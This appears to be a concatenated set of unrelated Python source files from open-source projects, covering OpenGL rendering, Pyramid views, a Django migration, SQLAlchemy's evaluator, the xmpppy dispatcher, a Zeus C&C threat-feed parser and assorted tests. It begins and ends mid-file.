GL.GL_ARRAY_BUFFER,
GL.GL_STATIC_DRAW,
data = vertices,
)
self.buffer_attributes = BufferAttributes()
self.buffer_attributes[ 'position' ] = GenericAttribute.from_dtype(
self.buffer,
vertices.dtype,
'position',
location = self.shader.attributes[ 'in_position' ]
)
self.buffer_attributes[ 'uv' ] = GenericAttribute.from_dtype(
self.buffer,
vertices.dtype,
'texture_coord',
location = self.shader.attributes[ 'in_uv' ]
)
self.vao = VertexArray()
self.vao.bind()
self.buffer.bind()
self.buffer_attributes.set()
self.buffer.unbind()
self.vao.unbind()
def draw( self, projection, model_view ):
global vertices
self.shader.bind()
self.shader.uniforms[ 'projection' ].value = projection
self.shader.uniforms[ 'model_view' ].value = model_view
self.shader.uniforms[ 'in_diffuse_texture' ].value = 0
self.vao.bind()
GL.glDrawArrays( GL.GL_TRIANGLES, 0, len( vertices ) )
self.vao.unbind()
self.shader.unbind()
class LegacyQuad( object ):
vertex_shader = textwrap.dedent( """
void main(void)
{
// apply projection and model view matrix to vertex
gl_Position = gl_ProjectionMatrix * gl_ModelViewMatrix * gl_Vertex;
// select the texture coordinate to use
gl_TexCoord[0] = gl_MultiTexCoord0;
}
""" )
fragment_shader = textwrap.dedent( """
// input
uniform sampler2D in_diffuse_texture;
void main(void)
{
// set colour of each fragment
gl_FragColor = texture2D( in_diffuse_texture, gl_TexCoord[0].st );
}
""" )
def __init__( self ):
super( LegacyQuad, self ).__init__()
global vertices
self.use_shaders = True
GL.glEnable(GL.GL_TEXTURE_2D)
self.shader = ShaderProgram(
VertexShader( self.vertex_shader ),
FragmentShader( self.fragment_shader )
)
self.buffer = VertexBuffer(
GL.GL_ARRAY_BUFFER,
GL.GL_STATIC_DRAW,
data = vertices,
)
self.buffer_attributes = BufferAttributes()
self.buffer_attributes[ 'position' ] = VertexAttribute.from_dtype(
self.buffer,
vertices.dtype,
'position'
)
self.buffer_attributes[ 'uv' ] = TextureCoordAttribute.from_dtype(
self.buffer,
vertices.dtype,
'texture_coord'
)
def draw( self ):
global vertices
if self.use_shaders:
self.shader.bind()
self.shader.uniforms[ 'in_diffuse_texture' ].value = 0
self.buffer_attributes.push_attributes()
self.buffer.bind()
self.buffer_attributes.set()
self.buffer.unbind()
GL.glDrawArrays( GL.GL_TRIANGLES, 0, len( vertices ) )
self.buffer_attributes.pop_attributes()
if self.use_shaders:
self.shader.unbind()
|
data/Pylons/virginia/virginia/views.py
|
import os
import mimetypes
mimetypes.add_type('text/html', '.stx')
mimetypes.add_type('application/pdf', '.pdf')
from zope.structuredtext import stx2html
from pyramid.response import Response
from pyramid.httpexceptions import HTTPFound
from pyramid.view import render_view_to_response
from pyramid.view import view_config
from virginia.models import File
from virginia.models import Directory
@view_config(context=File)
def file_view(context, request):
dirname, filename = os.path.split(context.path)
name, ext = os.path.splitext(filename)
result = render_view_to_response(context, request, ext)
return result
@view_config(context=Directory)
def directory_view(context, request):
path_info = request.environ['PATH_INFO']
if not path_info.endswith('/'):
response = HTTPFound(location=path_info + '/')
return response
defaults = ('index.html', 'index.stx', 'index.pt')
for name in defaults:
try:
index = context[name]
except KeyError:
continue
return file_view(index, request)
response = Response('No default view for %s' % context.path)
response.content_type = 'text/plain'
return response
@view_config(context=File, name='.stx')
def structured_text_view(context, request):
""" Filesystem-based STX view
"""
result = stx2html(context.source)
response = Response(result)
response.content_type = 'text/html'
return response
@view_config(context=File, name='.html')
@view_config(context=File, name='.pdf')
@view_config(context=File, name='.txt')
@view_config(context=File, name='.jpg')
def raw_view(context, request):
""" Just return the source raw.
"""
response = Response(context.source)
dirname, filename = os.path.split(context.path)
name, ext = os.path.splitext(filename)
mt, encoding = mimetypes.guess_type(filename)
response.content_type = mt or 'text/plain'
return response
|
data/OpenSlides/OpenSlides/openslides/users/migrations/0001_initial.py
|
from __future__ import unicode_literals
from django.db import migrations, models
import openslides.utils.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0006_require_contenttypes_0002'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(
default=False,
help_text='Designates that this user has all permissions without explicitly assigning them.',
verbose_name='superuser status')),
('username', models.CharField(blank=True, max_length=255, unique=True)),
('first_name', models.CharField(blank=True, max_length=255)),
('last_name', models.CharField(blank=True, max_length=255)),
('structure_level', models.CharField(blank=True, default='', max_length=255)),
('title', models.CharField(blank=True, default='', max_length=50)),
('about_me', models.TextField(blank=True, default='')),
('comment', models.TextField(blank=True, default='')),
('default_password', models.CharField(blank=True, default='', max_length=100)),
('is_active', models.BooleanField(default=True)),
('is_present', models.BooleanField(default=False)),
('groups', models.ManyToManyField(
blank=True,
help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.',
related_name='user_set',
related_query_name='user',
to='auth.Group',
verbose_name='groups')),
('user_permissions', models.ManyToManyField(
blank=True,
help_text='Specific permissions for this user.',
related_name='user_set',
related_query_name='user',
to='auth.Permission',
verbose_name='user permissions')),
],
options={
'permissions': (
('can_see_name', 'Can see names of users'),
('can_see_extra_data', 'Can see extra data of users (e.g. present and comment)'),
('can_manage', 'Can manage users')),
'default_permissions': (),
'ordering': ('last_name', 'first_name', 'username'),
},
bases=(openslides.utils.models.RESTModelMixin, models.Model),
),
]
|
data/PyHDI/Pyverilog/tests/dataflow_test/test_dat_case_in_func.py
|
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from pyverilog.dataflow.dataflow_analyzer import VerilogDataflowAnalyzer
from pyverilog.dataflow.optimizer import VerilogDataflowOptimizer
from pyverilog.controlflow.controlflow_analyzer import VerilogControlflowAnalyzer
codedir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + '/verilogcode/'
expected = """\
TOP.IN1: TOP_IN1
TOP.SEL: TOP_SEL
TOP.bit: (((TOP_SEL=='d0))? TOP_IN1 : 1'd0)
TOP.md_always0.al_block0.al_functioncall0._rn0_func1: TOP_IN1
TOP.md_always0.al_block0.al_functioncall0._rn1_func1: 1'd0
TOP.md_always0.al_block0.al_functioncall0.func1: (((TOP_SEL=='d0))? TOP_IN1 : 1'd0)
TOP.md_always0.al_block0.al_functioncall0.in1: TOP_IN1
TOP.md_always0.al_block0.al_functioncall0.sel: TOP_SEL
"""
def test():
filelist = [codedir + 'case_in_func.v']
topmodule = 'TOP'
noreorder = False
nobind = False
include = None
define = None
analyzer = VerilogDataflowAnalyzer(filelist, topmodule,
noreorder=noreorder,
nobind=nobind,
preprocess_include=include,
preprocess_define=define)
analyzer.generate()
directives = analyzer.get_directives()
instances = analyzer.getInstances()
terms = analyzer.getTerms()
binddict = analyzer.getBinddict()
optimizer = VerilogDataflowOptimizer(terms, binddict)
optimizer.resolveConstant()
c_analyzer = VerilogControlflowAnalyzer(topmodule, terms,
binddict,
resolved_terms=optimizer.getResolvedTerms(),
resolved_binddict=optimizer.getResolvedBinddict(),
constlist=optimizer.getConstlist()
)
output = []
for tk in sorted(c_analyzer.resolved_terms.keys(), key=lambda x:str(x)):
tree = c_analyzer.makeTree(tk)
output.append(str(tk) + ': ' + tree.tocode())
rslt = '\n'.join(output) + '\n'
print(rslt)
assert(expected == rslt)
if __name__ == '__main__':
test()
|
data/Net-ng/kansha/kansha/title/__init__.py
|
from .comp import EditableTitle
from .import view
|
data/RoseOu/flasky/venv/lib/python2.7/site-packages/sqlalchemy/orm/evaluator.py
|
import operator
from ..sql import operators
from .. import util
class UnevaluatableError(Exception):
pass
_straight_ops = set(getattr(operators, op)
for op in ('add', 'mul', 'sub',
'div',
'mod', 'truediv',
'lt', 'le', 'ne', 'gt', 'ge', 'eq'))
_notimplemented_ops = set(getattr(operators, op)
for op in ('like_op', 'notlike_op', 'ilike_op',
'notilike_op', 'between_op', 'in_op',
'notin_op', 'endswith_op', 'concat_op'))
class EvaluatorCompiler(object):
def __init__(self, target_cls=None):
self.target_cls = target_cls
def process(self, clause):
meth = getattr(self, "visit_%s" % clause.__visit_name__, None)
if not meth:
raise UnevaluatableError(
"Cannot evaluate %s" % type(clause).__name__)
return meth(clause)
def visit_grouping(self, clause):
return self.process(clause.element)
def visit_null(self, clause):
return lambda obj: None
def visit_false(self, clause):
return lambda obj: False
def visit_true(self, clause):
return lambda obj: True
def visit_column(self, clause):
if 'parentmapper' in clause._annotations:
parentmapper = clause._annotations['parentmapper']
if self.target_cls and not issubclass(
self.target_cls, parentmapper.class_):
util.warn(
"Can't do in-Python evaluation of criteria against "
"alternate class %s; "
"expiration of objects will not be accurate "
"and/or may fail. synchronize_session should be set to "
"False or 'fetch'. "
"This warning will be an exception "
"in 1.0." % parentmapper.class_
)
key = parentmapper._columntoproperty[clause].key
else:
key = clause.key
get_corresponding_attr = operator.attrgetter(key)
return lambda obj: get_corresponding_attr(obj)
def visit_clauselist(self, clause):
evaluators = list(map(self.process, clause.clauses))
if clause.operator is operators.or_:
def evaluate(obj):
has_null = False
for sub_evaluate in evaluators:
value = sub_evaluate(obj)
if value:
return True
has_null = has_null or value is None
if has_null:
return None
return False
elif clause.operator is operators.and_:
def evaluate(obj):
for sub_evaluate in evaluators:
value = sub_evaluate(obj)
if not value:
if value is None:
return None
return False
return True
else:
raise UnevaluatableError(
"Cannot evaluate clauselist with operator %s" %
clause.operator)
return evaluate
def visit_binary(self, clause):
eval_left, eval_right = list(map(self.process,
[clause.left, clause.right]))
operator = clause.operator
if operator is operators.is_:
def evaluate(obj):
return eval_left(obj) == eval_right(obj)
elif operator is operators.isnot:
def evaluate(obj):
return eval_left(obj) != eval_right(obj)
elif operator in _straight_ops:
def evaluate(obj):
left_val = eval_left(obj)
right_val = eval_right(obj)
if left_val is None or right_val is None:
return None
return operator(eval_left(obj), eval_right(obj))
else:
raise UnevaluatableError(
"Cannot evaluate %s with operator %s" %
(type(clause).__name__, clause.operator))
return evaluate
def visit_unary(self, clause):
eval_inner = self.process(clause.element)
if clause.operator is operators.inv:
def evaluate(obj):
value = eval_inner(obj)
if value is None:
return None
return not value
return evaluate
raise UnevaluatableError(
"Cannot evaluate %s with operator %s" %
(type(clause).__name__, clause.operator))
def visit_bindparam(self, clause):
val = clause.value
return lambda obj: val
|
data/ImageEngine/gaffer/contrib/ops/convertAnimCache.py
|
import os
import glob
import IECore
class convertAnimCache( IECore.Op ) :
def __init__( self ) :
IECore.Op.__init__( self, "Converts animation caches from an old skool format to a nice new one.", IECore.FileSequenceParameter( "result", "" ) )
self.parameters().addParameters(
[
IECore.FileSequenceParameter(
"inputSequence",
"The animation sequence to convert.",
defaultValue = "",
allowEmptyString = False,
check = IECore.FileSequenceParameter.CheckType.MustExist,
extensions = "fio",
),
IECore.FileSequenceParameter(
"outputSequence",
"The animation sequence to create",
defaultValue = "",
allowEmptyString = False,
extensions = "fio",
),
],
)
def doOperation( self, args ) :
src = self.parameters()["inputSequence"].getFileSequenceValue()
dst = self.parameters()["outputSequence"].getFileSequenceValue()
if isinstance( dst.frameList, IECore.EmptyFrameList ):
dst.frameList = src.frameList
for ( sf, df ) in zip( src.fileNames(), dst.fileNames() ) :
sc = IECore.AttributeCache( sf, IECore.IndexedIOOpenMode.Read )
dc = IECore.AttributeCache( df, IECore.IndexedIOOpenMode.Write )
combinedBound = IECore.Box3f()
for objectName in sc.objects() :
p = b = None
with IECore.IgnoredExceptions( Exception ) :
p = sc.read( objectName, "vertCache.P" )
b = sc.read( objectName, "vertCache.boundingBox" )
if p is not None and b is not None :
combinedBound.extendBy( b.value )
dc.write( "-" + objectName, "primVar:P", p )
dc.write( "-" + objectName, "bound", b )
dc.write( "-", "bound", IECore.Box3fData( combinedBound ) )
return args["outputSequence"].value
IECore.registerRunTimeTyped( convertAnimCache )
|
data/CouchPotato/CouchPotatoServer/libs/xmpp/dispatcher.py
|
"""
Main xmpppy mechanism. Provides library with methods to assign different handlers
to different XMPP stanzas.
Contains one tunable attribute: DefaultTimeout (25 seconds by default). It defines time that
Dispatcher.SendAndWaitForResponce method will wait for reply stanza before giving up.
"""
import simplexml,time,sys
from protocol import *
from client import PlugIn
DefaultTimeout=25
ID=0
class Dispatcher(PlugIn):
""" Ancestor of PlugIn class. Handles XMPP stream, i.e. aware of stream headers.
Can be plugged out/in to restart these headers (used for SASL f.e.). """
def __init__(self):
PlugIn.__init__(self)
DBG_LINE='dispatcher'
self.handlers={}
self._expected={}
self._defaultHandler=None
self._pendingExceptions=[]
self._eventHandler=None
self._cycleHandlers=[]
self._exported_methods=[self.Process,self.RegisterHandler,self.RegisterDefaultHandler,\
self.RegisterEventHandler,self.UnregisterCycleHandler,self.RegisterCycleHandler,\
self.RegisterHandlerOnce,self.UnregisterHandler,self.RegisterProtocol,\
self.WaitForResponse,self.SendAndWaitForResponse,self.send,self.disconnect,\
self.SendAndCallForResponse, ]
def dumpHandlers(self):
""" Return set of user-registered callbacks in it's internal format.
Used within the library to carry user handlers set over Dispatcher replugins. """
return self.handlers
def restoreHandlers(self,handlers):
""" Restores user-registered callbacks structure from dump previously obtained via dumpHandlers.
Used within the library to carry user handlers set over Dispatcher replugins. """
self.handlers=handlers
def _init(self):
""" Registers default namespaces/protocols/handlers. Used internally. """
self.RegisterNamespace('unknown')
self.RegisterNamespace(NS_STREAMS)
self.RegisterNamespace(self._owner.defaultNamespace)
self.RegisterProtocol('iq',Iq)
self.RegisterProtocol('presence',Presence)
self.RegisterProtocol('message',Message)
self.RegisterDefaultHandler(self.returnStanzaHandler)
self.RegisterHandler('error',self.streamErrorHandler,xmlns=NS_STREAMS)
def plugin(self, owner):
""" Plug the Dispatcher instance into Client class instance and send initial stream header. Used internally."""
self._init()
for method in self._old_owners_methods:
if method.__name__=='send': self._owner_send=method; break
self._owner.lastErrNode=None
self._owner.lastErr=None
self._owner.lastErrCode=None
self.StreamInit()
def plugout(self):
""" Prepares instance to be destructed. """
self.Stream.dispatch=None
self.Stream.DEBUG=None
self.Stream.features=None
self.Stream.destroy()
def StreamInit(self):
""" Send an initial stream header. """
self.Stream=simplexml.NodeBuilder()
self.Stream._dispatch_depth=2
self.Stream.dispatch=self.dispatch
self.Stream.stream_header_received=self._check_stream_start
self._owner.debug_flags.append(simplexml.DBG_NODEBUILDER)
self.Stream.DEBUG=self._owner.DEBUG
self.Stream.features=None
self._metastream=Node('stream:stream')
self._metastream.setNamespace(self._owner.Namespace)
self._metastream.setAttr('version','1.0')
self._metastream.setAttr('xmlns:stream',NS_STREAMS)
self._metastream.setAttr('to',self._owner.Server)
self._owner.send("<?xml version='1.0'?>%s>"%str(self._metastream)[:-2])
def _check_stream_start(self,ns,tag,attrs):
if ns<>NS_STREAMS or tag<>'stream':
raise ValueError('Incorrect stream start: (%s,%s). Terminating.'%(tag,ns))
def Process(self, timeout=0):
""" Check incoming stream for data waiting. If "timeout" is positive - block for as max. this time.
Returns:
1) length of processed data if some data were processed;
2) '0' string if no data were processed but link is alive;
3) 0 (zero) if underlying connection is closed.
Take note that in case of disconnection detect during Process() call
disconnect handlers are called automatically.
"""
for handler in self._cycleHandlers: handler(self)
if len(self._pendingExceptions) > 0:
_pendingException = self._pendingExceptions.pop()
raise _pendingException[0], _pendingException[1], _pendingException[2]
if self._owner.Connection.pending_data(timeout):
try: data=self._owner.Connection.receive()
except IOError: return
self.Stream.Parse(data)
if len(self._pendingExceptions) > 0:
_pendingException = self._pendingExceptions.pop()
raise _pendingException[0], _pendingException[1], _pendingException[2]
if data: return len(data)
return '0'
def RegisterNamespace(self,xmlns,order='info'):
""" Creates internal structures for newly registered namespace.
You can register handlers for this namespace afterwards. By default one namespace
already registered (jabber:client or jabber:component:accept depending on context. """
self.DEBUG('Registering namespace "%s"'%xmlns,order)
self.handlers[xmlns]={}
self.RegisterProtocol('unknown',Protocol,xmlns=xmlns)
self.RegisterProtocol('default',Protocol,xmlns=xmlns)
def RegisterProtocol(self,tag_name,Proto,xmlns=None,order='info'):
""" Used to declare some top-level stanza name to dispatcher.
Needed to start registering handlers for such stanzas.
Iq, message and presence protocols are registered by default. """
if not xmlns: xmlns=self._owner.defaultNamespace
self.DEBUG('Registering protocol "%s" as %s(%s)'%(tag_name,Proto,xmlns), order)
self.handlers[xmlns][tag_name]={type:Proto, 'default':[]}
def RegisterNamespaceHandler(self,xmlns,handler,typ='',ns='', makefirst=0, system=0):
""" Register handler for processing all stanzas for specified namespace. """
self.RegisterHandler('default', handler, typ, ns, xmlns, makefirst, system)
def RegisterHandler(self,name,handler,typ='',ns='',xmlns=None, makefirst=0, system=0):
"""Register user callback as stanzas handler of declared type. Callback must take
(if chained, see later) arguments: dispatcher instance (for replying), incomed
return of previous handlers.
The callback must raise xmpp.NodeProcessed just before return if it want preven
callbacks to be called with the same stanza as argument _and_, more importantly
library from returning stanza to sender with error set (to be enabled in 0.2 ve
Arguments:
"name" - name of stanza. F.e. "iq".
"handler" - user callback.
"typ" - value of stanza's "type" attribute. If not specified any value match
"ns" - namespace of child that stanza must contain.
"chained" - chain together output of several handlers.
"makefirst" - insert handler in the beginning of handlers list instead of
adding it to the end. Note that more common handlers (i.e. w/o "typ" and "
will be called first nevertheless.
"system" - call handler even if NodeProcessed Exception were raised already.
"""
if not xmlns: xmlns=self._owner.defaultNamespace
self.DEBUG('Registering handler %s for "%s" type->%s ns->%s(%s)'%(handler,name,typ,ns,xmlns), 'info')
if not typ and not ns: typ='default'
if not self.handlers.has_key(xmlns): self.RegisterNamespace(xmlns,'warn')
if not self.handlers[xmlns].has_key(name): self.RegisterProtocol(name,Protocol,xmlns,'warn')
if not self.handlers[xmlns][name].has_key(typ+ns): self.handlers[xmlns][name][typ+ns]=[]
if makefirst: self.handlers[xmlns][name][typ+ns].insert(0,{'func':handler,'system':system})
else: self.handlers[xmlns][name][typ+ns].append({'func':handler,'system':system})
def RegisterHandlerOnce(self,name,handler,typ='',ns='',xmlns=None,makefirst=0, system=0):
""" Unregister handler after first call (not implemented yet). """
if not xmlns: xmlns=self._owner.defaultNamespace
self.RegisterHandler(name, handler, typ, ns, xmlns, makefirst, system)
def UnregisterHandler(self,name,handler,typ='',ns='',xmlns=None):
""" Unregister handler. "typ" and "ns" must be specified exactly the same as with registering."""
if not xmlns: xmlns=self._owner.defaultNamespace
if not self.handlers.has_key(xmlns): return
if not typ and not ns: typ='default'
for pack in self.handlers[xmlns][name][typ+ns]:
if handler==pack['func']: break
else: pack=None
try: self.handlers[xmlns][name][typ+ns].remove(pack)
except ValueError: pass
def RegisterDefaultHandler(self,handler):
""" Specify the handler that will be used if no NodeProcessed exception were raised.
This is returnStanzaHandler by default. """
self._defaultHandler=handler
def RegisterEventHandler(self,handler):
""" Register handler that will process events. F.e. "FILERECEIVED" event. """
self._eventHandler=handler
def returnStanzaHandler(self,conn,stanza):
""" Return stanza back to the sender with <feature-not-implemennted/> error set. """
if stanza.getType() in ['get','set']:
conn.send(Error(stanza,ERR_FEATURE_NOT_IMPLEMENTED))
def streamErrorHandler(self,conn,error):
name,text='error',error.getData()
for tag in error.getChildren():
if tag.getNamespace()==NS_XMPP_STREAMS:
if tag.getName()=='text': text=tag.getData()
else: name=tag.getName()
if name in stream_exceptions.keys(): exc=stream_exceptions[name]
else: exc=StreamError
raise exc((name,text))
def RegisterCycleHandler(self,handler):
""" Register handler that will be called on every Dispatcher.Process() call. """
if handler not in self._cycleHandlers: self._cycleHandlers.append(handler)
def UnregisterCycleHandler(self,handler):
""" Unregister handler that will is called on every Dispatcher.Process() call."""
if handler in self._cycleHandlers: self._cycleHandlers.remove(handler)
def Event(self,realm,event,data):
""" Raise some event. Takes three arguments:
1) "realm" - scope of event. Usually a namespace.
2) "event" - the event itself. F.e. "SUCESSFULL SEND".
3) data that comes along with event. Depends on event."""
if self._eventHandler: self._eventHandler(realm,event,data)
def dispatch(self,stanza,session=None,direct=0):
""" Main procedure that performs XMPP stanza recognition and calling apppropriate handlers for it.
Called internally. """
if not session: session=self
session.Stream._mini_dom=None
name=stanza.getName()
if not direct and self._owner._route:
if name == 'route':
if stanza.getAttr('error') == None:
if len(stanza.getChildren()) == 1:
stanza = stanza.getChildren()[0]
name=stanza.getName()
else:
for each in stanza.getChildren():
self.dispatch(each,session,direct=1)
return
elif name == 'presence':
return
elif name in ('features','bind'):
pass
else:
raise UnsupportedStanzaType(name)
if name=='features': session.Stream.features=stanza
xmlns=stanza.getNamespace()
if not self.handlers.has_key(xmlns):
self.DEBUG("Unknown namespace: " + xmlns,'warn')
xmlns='unknown'
if not self.handlers[xmlns].has_key(name):
self.DEBUG("Unknown stanza: " + name,'warn')
name='unknown'
else:
self.DEBUG("Got %s/%s stanza"%(xmlns,name), 'ok')
if stanza.__class__.__name__=='Node': stanza=self.handlers[xmlns][name][type](node=stanza)
typ=stanza.getType()
if not typ: typ=''
stanza.props=stanza.getProperties()
ID=stanza.getID()
session.DEBUG("Dispatching %s stanza with type->%s props->%s id->%s"%(name,typ,stanza.props,ID),'ok')
list=['default']
if self.handlers[xmlns][name].has_key(typ): list.append(typ)
for prop in stanza.props:
if self.handlers[xmlns][name].has_key(prop): list.append(prop)
if typ and self.handlers[xmlns][name].has_key(typ+prop): list.append(typ+prop)
chain=self.handlers[xmlns]['default']['default']
for key in list:
if key: chain = chain + self.handlers[xmlns][name][key]
output=''
if session._expected.has_key(ID):
user=0
if type(session._expected[ID])==type(()):
cb,args=session._expected[ID]
session.DEBUG("Expected stanza arrived. Callback %s(%s) found!"%(cb,args),'ok')
try: cb(session,stanza,**args)
except Exception, typ:
if typ.__class__.__name__<>'NodeProcessed': raise
else:
session.DEBUG("Expected stanza arrived!",'ok')
session._expected[ID]=stanza
else: user=1
for handler in chain:
if user or handler['system']:
try:
handler['func'](session,stanza)
except Exception, typ:
if typ.__class__.__name__<>'NodeProcessed':
self._pendingExceptions.insert(0, sys.exc_info())
return
user=0
if user and self._defaultHandler: self._defaultHandler(session,stanza)
def WaitForResponse(self, ID, timeout=DefaultTimeout):
""" Block and wait until stanza with specific "id" attribute will come.
If no such stanza is arrived within timeout, return None.
If operation failed for some reason then owner's attributes
lastErrNode, lastErr and lastErrCode are set accordingly. """
self._expected[ID]=None
has_timed_out=0
abort_time=time.time() + timeout
self.DEBUG("Waiting for ID:%s with timeout %s..." % (ID,timeout),'wait')
while not self._expected[ID]:
if not self.Process(0.04):
self._owner.lastErr="Disconnect"
return None
if time.time() > abort_time:
self._owner.lastErr="Timeout"
return None
response=self._expected[ID]
del self._expected[ID]
if response.getErrorCode():
self._owner.lastErrNode=response
self._owner.lastErr=response.getError()
self._owner.lastErrCode=response.getErrorCode()
return response
def SendAndWaitForResponse(self, stanza, timeout=DefaultTimeout):
""" Put stanza on the wire and wait for recipient's response to it. """
return self.WaitForResponse(self.send(stanza),timeout)
def SendAndCallForResponse(self, stanza, func, args={}):
""" Put stanza on the wire and call back when recipient replies.
Additional callback arguments can be specified in args. """
self._expected[self.send(stanza)]=(func,args)
def send(self,stanza):
""" Serialise stanza and put it on the wire. Assign an unique ID to it before send.
Returns assigned ID."""
if type(stanza) in [type(''), type(u'')]: return self._owner_send(stanza)
if not isinstance(stanza,Protocol): _ID=None
elif not stanza.getID():
global ID
ID+=1
_ID=`ID`
stanza.setID(_ID)
else: _ID=stanza.getID()
if self._owner._registered_name and not stanza.getAttr('from'): stanza.setAttr('from',self._owner._registered_name)
if self._owner._route and stanza.getName()!='bind':
to=self._owner.Server
if stanza.getTo() and stanza.getTo().getDomain():
to=stanza.getTo().getDomain()
frm=stanza.getFrom()
if frm.getDomain():
frm=frm.getDomain()
route=Protocol('route',to=to,frm=frm,payload=[stanza])
stanza=route
stanza.setNamespace(self._owner.Namespace)
stanza.setParent(self._metastream)
self._owner_send(stanza)
return _ID
def disconnect(self):
""" Send a stream terminator and and handle all incoming stanzas before stream closure. """
self._owner_send('</stream:stream>')
while self.Process(1): pass
|
data/OneDrive/onedrive-sdk-python/src/onedrivesdk/request_builder_base.py
|
'''
------------------------------------------------------------------------------
Copyright (c) 2015 Microsoft Corporation
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
------------------------------------------------------------------------------
'''
class RequestBuilderBase(object):
def __init__(self, request_url, client):
"""Initialize a request builder which returns a request
when request() is called
Args:
request_url (str): The URL to construct the request
for
client (:class:`OneDriveClient<onedrivesdk.requests.one_drive_client.OneDriveClient>`):
The client with which the request will be made
"""
self._request_url = request_url
self._client = client
def append_to_request_url(self, url_segment):
"""Appends a URL portion to the current request URL
Args:
url_segment (str): The segment you would like to append
to the existing request URL.
"""
return self._request_url + "/" + url_segment
|
data/abusesa/abusehelper/abusehelper/bots/abusech/zeusccbot.py
|
"""
abuse.ch Zeus C&C RSS feed bot.
Maintainer: Lari Huttunen <mit-code@huttu.net>
"""
import re
from abusehelper.core import bot
from . import host_or_ip, resolve_level, split_description, AbuseCHFeedBot
class ZeusCcBot(AbuseCHFeedBot):
feed_malware = "zeus"
feed_type = "c&c"
feeds = bot.ListParam(default=["https://zeustracker.abuse.ch/rss.php"])
def parse_title(self, title):
pieces = title.split(None, 1)
yield host_or_ip(pieces[0])
if len(pieces) > 1:
date = pieces[1]
date = re.sub("[()]", "", date)
yield "source time", date + "Z"
def parse_description(self, description):
for key, value in split_description(description):
if key == "status":
yield key, value
elif key == "level":
yield "description", resolve_level(value)
elif key == "sbl" and value.lower() != "not listed":
yield key + " id", value
elif key == "ip address":
yield "ip", value
if __name__ == "__main__":
ZeusCcBot.from_command_line().execute()
|
data/Nordeus/pushkin/pushkin/tests/test_server_json.py
|
import pytest
from pushkin import pushkin_cli
import tornado.web
from pushkin import context
from pushkin.database import database
from pushkin.request.request_processor import RequestProcessor
from pushkin.requesthandlers.events import JsonEventHandler
from pushkin.requesthandlers.notifications import JsonNotificationHandler
from pushkin import test_config_ini_path
from pushkin import config
@pytest.fixture
def setup_database():
database.create_database()
@pytest.fixture
def mock_processor(mocker):
'''Mock request processor'''
mocker.patch('pushkin.request.request_processor.RequestProcessor.submit')
mocker.patch('pushkin.context.main_logger')
@pytest.fixture
def app():
pushkin_cli.CONFIGURATION_FILENAME = test_config_ini_path
pushkin_cli.init()
return pushkin_cli.create_app()
@pytest.fixture
def notification_batch_json():
''' Return a valid json request '''
return '''
{
"notifications": [
{
"login_id" : 1338,
"title" : "Msg title",
"content" : "Text of a message",
"screen" : "some_screen_id"
}
]
}
'''
@pytest.fixture
def post_notification_url(base_url):
return base_url + config.json_notification_handler_url
@pytest.fixture
def event_batch_json():
''' Return a valid json request '''
return '''
{
"events": [
{
"user_id" : 123,
"event_id" : 1,
"timestamp" : 12345,
"pairs": {
"some_constant" : "6",
"world_id" : "1"
}
}
]
}
'''
@pytest.fixture
def post_event_url(base_url):
return base_url + config.json_event_handler_url
@pytest.mark.gen_test
@pytest.mark.parametrize("input", [
(''),
('asd'),
])
def test_post_notification_empty_request(setup_database, mock_processor, http_client, post_notification_url, input):
'''Test that server responds with 400 if invalid parameter is supplied to post_notification request'''
request = tornado.httpclient.HTTPRequest(post_notification_url, method='POST', body=input)
with pytest.raises(tornado.httpclient.HTTPError):
yield http_client.fetch(request)
assert not context.request_processor.submit.called
@pytest.mark.gen_test
def test_post_notification(setup_database, mock_processor, http_client, post_notification_url,
notification_batch_json):
'''Test that a valid request is succesfully parsed in post_notification'''
request = tornado.httpclient.HTTPRequest(post_notification_url, method='POST', body=notification_batch_json)
response = yield http_client.fetch(request)
assert response.code == 200
assert context.request_processor.submit.called
@pytest.mark.gen_test
@pytest.mark.parametrize("input", [
(''),
('asd'),
])
def test_post_event_empty_request(setup_database, mock_processor, http_client, post_event_url, input):
'''Test that server responds with 400 if invalid parameter is supplied to post_event request'''
request = tornado.httpclient.HTTPRequest(post_event_url, method='POST', body=input)
with pytest.raises(tornado.httpclient.HTTPError):
yield http_client.fetch(request)
assert not context.request_processor.submit.called
@pytest.mark.gen_test
def test_post_event(setup_database, mock_processor, http_client, post_event_url, event_batch_json):
'''Test that a valid request is succesfully parsed in post_event'''
context.request_processor.submit.return_value = True
request = tornado.httpclient.HTTPRequest(post_event_url, method='POST', body=event_batch_json)
response = yield http_client.fetch(request)
assert response.code == 200
assert context.request_processor.submit.called
@pytest.mark.gen_test
def test_post_event_service_unavailable(setup_database, mock_processor, http_client, post_event_url, event_batch_json,
app):
'''Test that service_unavailable is returned if server load is more that expected'''
context.request_processor.submit.return_value = False
request = tornado.httpclient.HTTPRequest(post_event_url, method='POST', body=event_batch_json)
RequestProcessor.submit.return_value = False
with pytest.raises(tornado.httpclient.HTTPError):
yield http_client.fetch(request)
|
data/SuperCowPowers/workbench/workbench/clients/pe_peid.py
|
"""This client looks for PEid signatures in PE Files."""
import zerorpc
import os
import pprint
import client_helper
def run():
"""This client looks for PEid signatures in PE Files."""
args = client_helper.grab_server_args()
